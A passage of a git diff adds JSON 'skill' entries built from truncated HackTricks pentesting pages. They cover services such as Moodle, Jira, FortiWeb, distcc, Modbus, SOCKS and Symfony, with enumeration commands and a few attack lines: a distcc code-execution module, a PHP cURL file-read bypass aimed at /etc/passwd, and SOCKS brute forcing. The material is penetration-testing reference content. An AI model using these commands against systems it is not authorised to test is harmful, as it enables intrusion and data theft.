+ "description": "# Moodle\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Automatic Scans\n\n### droopescan\n\n```bash\npip3 install droopescan\ndroopescan scan moodle -u http://moodle.example.com//\n\n[+] Plugins found:\n forum http://moodle.schooled.htb/moodle/mod/forum/\n http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt\n http://moodle.schooled.htb/moodle/mod/forum/version.php\n\n[+] No themes found.\n\n[+] Possible version(s):\n 3.10.0-beta\n\n[+] Possible interesting urls found:",
+ "payloads": [
+ "# Moodle",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Automatic Scans",
+ "### droopescan",
+ "```bash",
+ "pip3 install droopescan",
+ "droopescan scan moodle -u http://moodle.example.com//",
+ "[+] Plugins found:",
+ "forum http://moodle.schooled.htb/moodle/mod/forum/",
+ "http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt",
+ "http://moodle.schooled.htb/moodle/mod/forum/version.php",
+ "[+] No themes found.",
+ "[+] Possible version(s):",
+ "3.10.0-beta",
+ "[+] Possible interesting urls found:"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/moodle.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_4b6c24002537.json b/skills/network_services_pentesting_4b6c24002537.json
new file mode 100644
index 0000000..6dc2d30
--- /dev/null
+++ b/skills/network_services_pentesting_4b6c24002537.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_4b6c24002537",
+ "category": "network-services-pentesting",
+ "title": "jira",
+ "description": "# Jira & Confluence\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n## Check Privileges\n\nIn Jira, **privileges can be checked** by any user, authenticated or not, through the endpoints `/rest/api/2/mypermissions` or `/rest/api/3/mypermissions`. These endpoints reveal the user's current privileges. A notable concern arises when **non-authenticated users hold privileges**, indicating a **security vulnerability** that could potentially be eligible for a **bounty**. Similarly, **unexpected priv",
+ "payloads": [
+ "# Jira & Confluence",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Check Privileges",
+ "In Jira, **privileges can be checked** by any user, authenticated or not, through the endpoints `/rest/api/2/mypermissions` or `/rest/api/3/mypermissions`. These endpoints reveal the user's current privileges. A notable concern arises when **non-authenticated users hold privileges**, indicating a **security vulnerability** that could potentially be eligible for a **bounty**. Similarly, **unexpected privileges for authenticated users** also highlight a **vulnerability**.",
+ "An important **update** was made on **1st February 2019**, requiring the 'mypermissions' endpoint to include a **'permission' parameter**. This requirement aims to **enhance security** by specifying the privileges being queried: [check it here](https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter)",
+ "- ADD_COMMENTS",
+ "- ADMINISTER",
+ "- ADMINISTER_PROJECTS",
+ "- ASSIGNABLE_USER",
+ "- ASSIGN_ISSUES",
+ "- BROWSE_PROJECTS",
+ "- BULK_CHANGE",
+ "- CLOSE_ISSUES",
+ "- CREATE_ATTACHMENTS",
+ "- CREATE_ISSUES"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/jira.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_4f5ffefda5a5.json b/skills/network_services_pentesting_4f5ffefda5a5.json
new file mode 100644
index 0000000..55a1620
--- /dev/null
+++ b/skills/network_services_pentesting_4f5ffefda5a5.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_4f5ffefda5a5",
+ "category": "network-services-pentesting",
+ "title": "fortinet fortiweb",
+ "description": "# Fortinet FortiWeb \u2014 Auth bypass via API-prefix traversal and CGIINFO impersonation\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Overview\n\nFortinet FortiWeb exposes a centralized CGI dispatcher at `/cgi-bin/fwbcgi`. A two-bug chain allows an unauthenticated remote attacker to:\n- Reach `fwbcgi` by starting the URL with a valid API prefix and traversing directories.\n- Impersonate any user (including the built-in `admin`) by supplying a special HTTP header that the CGI trusts as identity",
+ "payloads": [
+ "# Fortinet FortiWeb \u2014 Auth bypass via API-prefix traversal and CGIINFO impersonation",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Overview",
+ "Fortinet FortiWeb exposes a centralized CGI dispatcher at `/cgi-bin/fwbcgi`. A two-bug chain allows an unauthenticated remote attacker to:",
+ "- Reach `fwbcgi` by starting the URL with a valid API prefix and traversing directories.",
+ "- Impersonate any user (including the built-in `admin`) by supplying a special HTTP header that the CGI trusts as identity.",
+ "Vendor advisory: FG\u2011IR\u201125\u2011910 (CVE\u20112025\u201164446). Exploitation has been observed in the wild to create persistent admin users.",
+ "Impacted versions (as publicly documented):",
+ "- 8.0 < 8.0.2",
+ "- 7.6 < 7.6.5",
+ "- 7.4 < 7.4.10",
+ "- 7.2 < 7.2.12",
+ "- 7.0 < 7.0.12",
+ "- 6.4 \u2264 6.4.3",
+ "- 6.3 \u2264 6.3.23"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/fortinet-fortiweb.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_506f845f3da4.json b/skills/network_services_pentesting_506f845f3da4.json
new file mode 100644
index 0000000..4e5c184
--- /dev/null
+++ b/skills/network_services_pentesting_506f845f3da4.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_506f845f3da4",
+ "category": "network-services-pentesting",
+ "title": "3632 pentesting distcc",
+ "description": "# 3632 - Pentesting Distcc\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**Distcc** is a tool that enhances the **compilation process** by utilizing the **idle processing power** of other computers in the network. When **distcc** is set up on a machine, this machine is capable of distributing its **compilation tasks** to another system. This recipient system must be running the **distccd daemon** and must have a **compatible compiler** installed to process the sent code.",
+ "payloads": [
+ "# 3632 - Pentesting Distcc",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**Distcc** is a tool that enhances the **compilation process** by utilizing the **idle processing power** of other computers in the network. When **distcc** is set up on a machine, this machine is capable of distributing its **compilation tasks** to another system. This recipient system must be running the **distccd daemon** and must have a **compatible compiler** installed to process the sent code.",
+ "**Default port:** 3632",
+ "PORT STATE SERVICE",
+ "3632/tcp open distccd",
+ "## Exploitation",
+ "Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code:",
+ "```bash",
+ "msf5 > use exploit/unix/misc/distcc_exec",
+ "nmap -p 3632 --script distcc-cve2004-2687 --script-args=\"distcc-exec.cmd='id'\"",
+ "## Shodan",
+ "_I don't think shodan detects this service._",
+ "## Resources"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/3632-pentesting-distcc.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_50fba220d522.json b/skills/network_services_pentesting_50fba220d522.json
new file mode 100644
index 0000000..2aae993
--- /dev/null
+++ b/skills/network_services_pentesting_50fba220d522.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_50fba220d522",
+ "category": "network-services-pentesting",
+ "title": "wsgi",
+ "description": "# WSGI Post-Exploitation Tricks\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## WSGI Overview\n\nWeb Server Gateway Interface (WSGI) is a specification that describes how a web server communicates with web applications, and how web applications can be chained together to process one request. uWSGI is one of the most popular WSGI servers, often used to serve Python web applications. Its native binary transport is the uwsgi protocol (lowercase) which carries a bag of key/value parameters (\"uw",
+ "payloads": [
+ "# WSGI Post-Exploitation Tricks",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## WSGI Overview",
+ "Web Server Gateway Interface (WSGI) is a specification that describes how a web server communicates with web applications, and how web applications can be chained together to process one request. uWSGI is one of the most popular WSGI servers, often used to serve Python web applications. Its native binary transport is the uwsgi protocol (lowercase) which carries a bag of key/value parameters (\"uwsgi params\") to the backend application server.",
+ "Related pages you may also want to check:",
+ "{{#ref}}",
+ "werkzeug.md",
+ "{{#endref}}",
+ "{{#ref}}",
+ "../../pentesting-web/ssrf-server-side-request-forgery/README.md",
+ "{{#endref}}",
+ "## uWSGI Magic Variables Exploitation",
+ "uWSGI provides special \"magic variables\" that can change how the instance loads and dispatches applications. These variables are not normal HTTP headers \u2014 they are uwsgi parameters carried inside the uwsgi/SCGI/FastCGI request from the reverse proxy (nginx, Apache mod_proxy_uwsgi, etc.) to the uWSGI backend. If a proxy configuration maps user-controlled data into uwsgi parameters (for example via `$arg_*`, `$http_*`, or unsafely exposed endpoints that talk the uwsgi protocol), attackers can set these variables and achieve code execution.",
+ "### Dangerous mappings in front proxies (nginx example)",
+ "Misconfigurations like the following directly expose uWSGI magic variables to user input:"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/wsgi.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_54096096cae9.json b/skills/network_services_pentesting_54096096cae9.json
new file mode 100644
index 0000000..7998e59
--- /dev/null
+++ b/skills/network_services_pentesting_54096096cae9.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_54096096cae9",
+ "category": "network-services-pentesting",
+ "title": "44818 ethernetip",
+ "description": "# 44818 Pentesting EtherNet/IP\n\n{{#include ../banners/hacktricks-training.md}}\n\n## **Protocol Information**\n\nEtherNet/IP is an **industrial Ethernet networking protocol** commonly used in **industrial automation control systems**. It was developed by Rockwell Automation in the late 1990s and is managed by ODVA. The protocol ensures **multi-vendor system interoperability** and is utilized in various applications such as **water processing plants**, **manufacturing facilities**, and **utilities**.",
+ "payloads": [
+ "# 44818 Pentesting EtherNet/IP",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Protocol Information**",
+ "EtherNet/IP is an **industrial Ethernet networking protocol** commonly used in **industrial automation control systems**. It was developed by Rockwell Automation in the late 1990s and is managed by ODVA. The protocol ensures **multi-vendor system interoperability** and is utilized in various applications such as **water processing plants**, **manufacturing facilities**, and **utilities**. To identify an EtherNet/IP device, a query is sent to **TCP/44818** with a **list Identities Message (0x63)**.",
+ "**Default port:** 44818 UDP/TCP",
+ "PORT STATE SERVICE",
+ "44818/tcp open EtherNet/IP",
+ "## **Enumeration**",
+ "```bash",
+ "nmap -n -sV --script enip-info -p 44818 ",
+ "pip3 install cpppo",
+ "python3 -m cpppo.server.enip.list_services [--udp] [--broadcast] --list-identity -a ",
+ "## Shodan",
+ "- `port:44818 \"product name\"`",
+ "{{#include ../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/44818-ethernetip.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_5514b88e3d27.json b/skills/network_services_pentesting_5514b88e3d27.json
new file mode 100644
index 0000000..e52e27f
--- /dev/null
+++ b/skills/network_services_pentesting_5514b88e3d27.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_5514b88e3d27",
+ "category": "network-services-pentesting",
+ "title": "pentesting telnet",
+ "description": "# 23 - Pentesting Telnet\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## **Basic Information**\n\nTelnet is a network protocol that gives users a UNsecure way to access a computer over a network.\n\n**Default port:** 23\n\n```\n23/tcp open telnet\n```\n\n## **Enumeration**\n\n### **Banner Grabbing**\n\n```bash\nnc -vn 23\n```\n\nAll the interesting enumeration can be performed by **nmap**:\n\n```bash\nnmap -n -sV -Pn --script \"*telnet* and safe\" -p 23 \n```\n\nThe script `telnet-ntlm-info.nse` will obtai",
+ "payloads": [
+ "# 23 - Pentesting Telnet",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Basic Information**",
+ "Telnet is a network protocol that gives users a UNsecure way to access a computer over a network.",
+ "**Default port:** 23",
+ "23/tcp open telnet",
+ "## **Enumeration**",
+ "### **Banner Grabbing**",
+ "```bash",
+ "nc -vn 23",
+ "All the interesting enumeration can be performed by **nmap**:",
+ "```bash",
+ "nmap -n -sV -Pn --script \"*telnet* and safe\" -p 23 ",
+ "The script `telnet-ntlm-info.nse` will obtain NTLM info (Windows versions).",
+ "From the [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): In the TELNET Protocol are various \"**options**\" that will be sanctioned and may be used with the \"**DO, DON'T, WILL, WON'T**\" structure to allow a user and server to agree to use a more elaborate (or perhaps just different) set of conventions for their TELNET connection. Such options could include changing the character set, the echo mode, etc."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-telnet.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_5b80eccf5784.json b/skills/network_services_pentesting_5b80eccf5784.json
new file mode 100644
index 0000000..3239a0f
--- /dev/null
+++ b/skills/network_services_pentesting_5b80eccf5784.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_5b80eccf5784",
+ "category": "network-services-pentesting",
+ "title": "code review tools",
+ "description": "# Source code Review / SAST Tools\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Guidance and & Lists of tools\n\n- [**https://owasp.org/www-community/Source_Code_Analysis_Tools**](https://owasp.org/www-community/Source_Code_Analysis_Tools)\n- [**https://github.com/analysis-tools-dev/static-analysis**](https://github.com/analysis-tools-dev/static-analysis)\n\n## Multi-Language Tools\n\n### [Naxus - AI-Gents](https://www.naxusai.com/)\n\nThere is a **free package to review PRs**.\n\n### [**Semgrep**",
+ "payloads": [
+ "# Source code Review / SAST Tools",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Guidance and & Lists of tools",
+ "- [**https://owasp.org/www-community/Source_Code_Analysis_Tools**](https://owasp.org/www-community/Source_Code_Analysis_Tools)",
+ "- [**https://github.com/analysis-tools-dev/static-analysis**](https://github.com/analysis-tools-dev/static-analysis)",
+ "## Multi-Language Tools",
+ "### [Naxus - AI-Gents](https://www.naxusai.com/)",
+ "There is a **free package to review PRs**.",
+ "### [**Semgrep**](https://github.com/returntocorp/semgrep)",
+ "It's an **Open Source tool**.",
+ "#### Supported Languages",
+ "| Category | Languages |",
+ "| ------------ | ----------------------------------------------------------------------------------------------------- |",
+ "| GA | C# \u00b7 Go \u00b7 Java \u00b7 JavaScript \u00b7 JSX \u00b7 JSON \u00b7 PHP \u00b7 Python \u00b7 Ruby \u00b7 Scala \u00b7 Terraform \u00b7 TypeScript \u00b7 TSX |",
+ "| Beta | Kotlin \u00b7 Rust |"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/code-review-tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_5b9f13f99e7a.json b/skills/network_services_pentesting_5b9f13f99e7a.json
new file mode 100644
index 0000000..d7c4cef
--- /dev/null
+++ b/skills/network_services_pentesting_5b9f13f99e7a.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_5b9f13f99e7a",
+ "category": "network-services-pentesting",
+ "title": "disable functions bypass php 5.2.4 and 5.2.5 php curl",
+ "description": "# PHP 5.2.4 and 5.2.5 PHP cURL\n\n{{#include ../../../../banners/hacktricks-training.md}}\n\nThis page documents a legacy but still useful-in-CTFs/local-legacy-installs trick to bypass PHP safe_mode/open_basedir checks using the cURL extension on specific PHP 5.2.x builds.\n\n- Affected: PHP 5.2.4 and 5.2.5 with ext/curl enabled.\n- Impact: Read arbitrary local files despite safe_mode or open_basedir restrictions (no direct code execution).\n- ID: CVE-2007-4850.\n\nFrom http://blog.safebuff.com/2016/05/06",
+ "payloads": [
+ "# PHP 5.2.4 and 5.2.5 PHP cURL",
+ "{{#include ../../../../banners/hacktricks-training.md}}",
+ "This page documents a legacy but still useful-in-CTFs/local-legacy-installs trick to bypass PHP safe_mode/open_basedir checks using the cURL extension on specific PHP 5.2.x builds.",
+ "- Affected: PHP 5.2.4 and 5.2.5 with ext/curl enabled.",
+ "- Impact: Read arbitrary local files despite safe_mode or open_basedir restrictions (no direct code execution).",
+ "- ID: CVE-2007-4850.",
+ "From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/",
+ "## One-liner PoC",
+ "If safe_mode or open_basedir are active and cURL is enabled, the following will return the contents of the current script:",
+ "```php",
+ "var_dump(curl_exec(curl_init(\"file://safe_mode_bypass\\x00\".__FILE__)));",
+ "## More explicit PoC (arbitrary file read)",
+ "```php",
+ "// Preconditions (legacy): PHP 5.2.4/5.2.5, safe_mode or open_basedir enabled, ext/curl loaded",
+ "$target = '/etc/passwd'; // change to the file you want to read"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_61ba4109d259.json b/skills/network_services_pentesting_61ba4109d259.json
new file mode 100644
index 0000000..1bf9ac1
--- /dev/null
+++ b/skills/network_services_pentesting_61ba4109d259.json
@@ -0,0 +1,25 @@
+{
+ "id": "network_services_pentesting_61ba4109d259",
+ "category": "network-services-pentesting",
+ "title": "pentesting modbus",
+ "description": "# # 502/tcp - Pentesting Modbus Protocol\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## Basic Information\n\nIn 1979, the **Modbus Protocol** was developed by Modicon, serving as a messaging structure. Its primary use involves facilitating communication between intelligent devices, operating under a master-slave/client-server model. This protocol plays a crucial role in enabling devices to exchange data efficiently.\n\n**Default port:** 502\n\n```\nPORT STATE SERVICE\n502/tcp open modbus\n```\n\n",
+ "payloads": [
+ "# # 502/tcp - Pentesting Modbus Protocol",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "In 1979, the **Modbus Protocol** was developed by Modicon, serving as a messaging structure. Its primary use involves facilitating communication between intelligent devices, operating under a master-slave/client-server model. This protocol plays a crucial role in enabling devices to exchange data efficiently.",
+ "**Default port:** 502",
+ "PORT STATE SERVICE",
+ "502/tcp open modbus",
+ "## Enumeration",
+ "```bash",
+ "nmap --script modbus-discover -p 502 ",
+ "msf> use auxiliary/scanner/scada/modbusdetect",
+ "msf> use auxiliary/scanner/scada/modbus_findunitid",
+ "{{#include ../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-modbus.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_63986ff0a73a.json b/skills/network_services_pentesting_63986ff0a73a.json
new file mode 100644
index 0000000..7c6e047
--- /dev/null
+++ b/skills/network_services_pentesting_63986ff0a73a.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_63986ff0a73a",
+ "category": "network-services-pentesting",
+ "title": "1080 pentesting socks",
+ "description": "# 1080 - Pentesting Socks\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**SOCKS** is a protocol used for transferring data between a client and server through a proxy. The fifth version, **SOCKS5**, adds an optional authentication feature, allowing only authorized users to access the server. It primarily handles the proxying of TCP connections and the forwarding of UDP packets (via the `UDP ASSOCIATE` command), operating at the session layer (Layer 5) of the OSI model. W",
+ "payloads": [
+ "# 1080 - Pentesting Socks",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**SOCKS** is a protocol used for transferring data between a client and server through a proxy. The fifth version, **SOCKS5**, adds an optional authentication feature, allowing only authorized users to access the server. It primarily handles the proxying of TCP connections and the forwarding of UDP packets (via the `UDP ASSOCIATE` command), operating at the session layer (Layer 5) of the OSI model. When tooling supports the `socks5h` scheme, DNS resolution is forced through the proxy, preventing local DNS leaks and making it harder to fingerprint the originating host.",
+ "**Default Port:** 1080",
+ "## Enumeration",
+ "### Authentication Check",
+ "```bash",
+ "nmap -p 1080 --script socks-auth-info",
+ "### Brute Force",
+ "#### Basic usage",
+ "```bash",
+ "nmap --script socks-brute -p 1080 ",
+ "#### Advanced usage",
+ "```bash"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/1080-pentesting-socks.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_644421996e4b.json b/skills/network_services_pentesting_644421996e4b.json
new file mode 100644
index 0000000..e89ebee
--- /dev/null
+++ b/skills/network_services_pentesting_644421996e4b.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_644421996e4b",
+ "category": "network-services-pentesting",
+ "title": "symphony",
+ "description": "# Symfony\n\n{{#include ../../banners/hacktricks-training.md}}\n\nSymfony is one of the most widely-used PHP frameworks and regularly appears in assessments of enterprise, e-commerce and CMS targets (Drupal, Shopware, Ibexa, OroCRM \u2026 all embed Symfony components). This page collects offensive tips, common mis-configurations and recent vulnerabilities you should have on your checklist when you discover a Symfony application.\n\n> Historical note: A large part of the ecosystem still runs the **5.4 LTS*",
+ "payloads": [
+ "# Symfony",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "Symfony is one of the most widely-used PHP frameworks and regularly appears in assessments of enterprise, e-commerce and CMS targets (Drupal, Shopware, Ibexa, OroCRM \u2026 all embed Symfony components). This page collects offensive tips, common mis-configurations and recent vulnerabilities you should have on your checklist when you discover a Symfony application.",
+ "> Historical note: A large part of the ecosystem still runs the **5.4 LTS** branch (EOL **November 2025**). Always verify the exact minor version because many 2023-2025 security advisories only fixed in patch releases (e.g. 5.4.46 \u2192 5.4.50).",
+ "## Recon & Enumeration",
+ "### Finger-printing",
+ "* HTTP response headers: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` or cookies starting with `sf_redirect`, `sf_session`, `MOCKSESSID`.",
+ "* Source code leaks (`composer.json`, `composer.lock`, `/vendor/\u2026`) often reveal the exact version:",
+ "```bash",
+ "curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test(\"symfony/\")) | .name,.version'",
+ "* Public routes that only exist on Symfony:",
+ "* `/_profiler` (Symfony **Profiler** & debug toolbar)",
+ "* `/_wdt/` (\u201cWeb Debug Toolbar\u201d)",
+ "* `/_error/{code}.{_format}` (pretty error pages)",
+ "* `/app_dev.php`, `/config.php`, `/config_dev.php` (pre-4.0 dev front-controllers)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/symphony.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_655c80a0cf62.json b/skills/network_services_pentesting_655c80a0cf62.json
new file mode 100644
index 0000000..5a7dbee
--- /dev/null
+++ b/skills/network_services_pentesting_655c80a0cf62.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_655c80a0cf62",
+ "category": "network-services-pentesting",
+ "title": "ksmbd attack surface and fuzzing syzkaller",
+ "description": "# ksmbd Attack Surface & SMB2/SMB3 Protocol Fuzzing (syzkaller)\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Overview\nThis page abstracts practical techniques to exercise and fuzz the Linux in-kernel SMB server (ksmbd) using syzkaller. It focuses on expanding the protocol attack surface through configuration, building a stateful harness capable of chaining SMB2 operations, generating grammar-valid PDUs, biasing mutations into weakly-covered code paths, and leveraging syzkaller features",
+ "payloads": [
+ "# ksmbd Attack Surface & SMB2/SMB3 Protocol Fuzzing (syzkaller)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Overview",
+ "This page abstracts practical techniques to exercise and fuzz the Linux in-kernel SMB server (ksmbd) using syzkaller. It focuses on expanding the protocol attack surface through configuration, building a stateful harness capable of chaining SMB2 operations, generating grammar-valid PDUs, biasing mutations into weakly-covered code paths, and leveraging syzkaller features such as focus_areas and ANYBLOB. While the original research enumerates specific CVEs, here we emphasise the reusable methodology and concrete snippets you can adapt to your own setups.",
+ "Target scope: SMB2/SMB3 over TCP. Kerberos and RDMA are intentionally out-of-scope to keep the harness simple.",
+ "## Expand ksmbd Attack Surface via Configuration",
+ "By default, a minimal ksmbd setup leaves large parts of the server untested. Enable the following features to drive the server through additional parsers/handlers and reach deeper code paths:",
+ "- Global-level",
+ "- Durable handles",
+ "- Server multi-channel",
+ "- SMB2 leases",
+ "- Per-share-level",
+ "- Oplocks (on by default)",
+ "- VFS objects",
+ "Enabling these increases execution in modules such as:"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_656d8c032ed9.json b/skills/network_services_pentesting_656d8c032ed9.json
new file mode 100644
index 0000000..681cd36
--- /dev/null
+++ b/skills/network_services_pentesting_656d8c032ed9.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_656d8c032ed9",
+ "category": "network-services-pentesting",
+ "title": "3299 pentesting saprouter",
+ "description": "# # 3299/tcp - Pentesting SAProuter\n\n{{#include ../banners/hacktricks-training.md}}\n\n```text\nPORT STATE SERVICE VERSION\n3299/tcp open saprouter?\n```\n\nThis is a summary of the post from [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/)\n\n## Understanding SAProuter Penetration with Metasploit\n\nSAProuter acts as a reverse proxy for SAP systems, primarily to control access between the internet and i",
+ "payloads": [
+ "# # 3299/tcp - Pentesting SAProuter",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "```text",
+ "PORT STATE SERVICE VERSION",
+ "3299/tcp open saprouter?",
+ "This is a summary of the post from [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/)",
+ "## Understanding SAProuter Penetration with Metasploit",
+ "SAProuter acts as a reverse proxy for SAP systems, primarily to control access between the internet and internal SAP networks. It's commonly exposed to the internet by allowing TCP port 3299 through organizational firewalls. This setup makes SAProuter an attractive target for penetration testing because it might serve as a gateway to high-value internal networks.",
+ "**Scanning and Information Gathering**",
+ "Initially, a scan is performed to identify if a SAP router is running on a given IP using the **sap_service_discovery** module. This step is crucial for establishing the presence of a SAP router and its open port.",
+ "```text",
+ "msf> use auxiliary/scanner/sap/sap_service_discovery",
+ "msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101",
+ "msf auxiliary(sap_service_discovery) > run",
+ "Following the discovery, further investigation into the SAP router's configuration is carried out with the **sap_router_info_request** module to potentially reveal internal network details."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/3299-pentesting-saprouter.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_660f4e985a21.json b/skills/network_services_pentesting_660f4e985a21.json
new file mode 100644
index 0000000..51feecf
--- /dev/null
+++ b/skills/network_services_pentesting_660f4e985a21.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_660f4e985a21",
+ "category": "network-services-pentesting",
+ "title": "graphql",
+ "description": "# GraphQL\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Introduction\n\nGraphQL is **highlighted** as an **efficient alternative** to REST API, offering a simplified approach for querying data from the backend. In contrast to REST, which often necessitates numerous requests across varied endpoints to gather data, GraphQL enables the fetching of all required information through a **single request**. This streamlining significantly **benefits developers** by diminishing the intricacy of the",
+ "payloads": [
+ "# GraphQL",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Introduction",
+ "GraphQL is **highlighted** as an **efficient alternative** to REST API, offering a simplified approach for querying data from the backend. In contrast to REST, which often necessitates numerous requests across varied endpoints to gather data, GraphQL enables the fetching of all required information through a **single request**. This streamlining significantly **benefits developers** by diminishing the intricacy of their data fetching processes.",
+ "## GraphQL and Security",
+ "With the advent of new technologies, including GraphQL, new security vulnerabilities also emerge. A key point to note is that **GraphQL does not include authentication mechanisms by default**. It's the responsibility of developers to implement such security measures. Without proper authentication, GraphQL endpoints may expose sensitive information to unauthenticated users, posing a significant security risk.",
+ "### Directory Brute Force Attacks and GraphQL",
+ "To identify exposed GraphQL instances, the inclusion of specific paths in directory brute force attacks is recommended. These paths are:",
+ "- `/graphql`",
+ "- `/graphiql`",
+ "- `/graphql.php`",
+ "- `/graphql/console`",
+ "- `/api`",
+ "- `/api/graphql`",
+ "- `/graphql/api`"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/graphql.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_6ea355980c7e.json b/skills/network_services_pentesting_6ea355980c7e.json
new file mode 100644
index 0000000..27b174f
--- /dev/null
+++ b/skills/network_services_pentesting_6ea355980c7e.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_6ea355980c7e",
+ "category": "network-services-pentesting",
+ "title": "15672 pentesting rabbitmq management",
+ "description": "# 15672 - Pentesting RabbitMQ Management\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n\n## Basic Information\n\nYou can learn more about RabbitMQ in [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md).\\\nIn this port you may find the RabbitMQ Management web console if the [management plugin](https://www.rabbitmq.com/management.html) is enabled.\\\nThe main page should looks like this:\n\n.png>)\n\n## Enumeration\n\nThe default credentials are \"_**guest**_\":\"_**gues",
+ "payloads": [
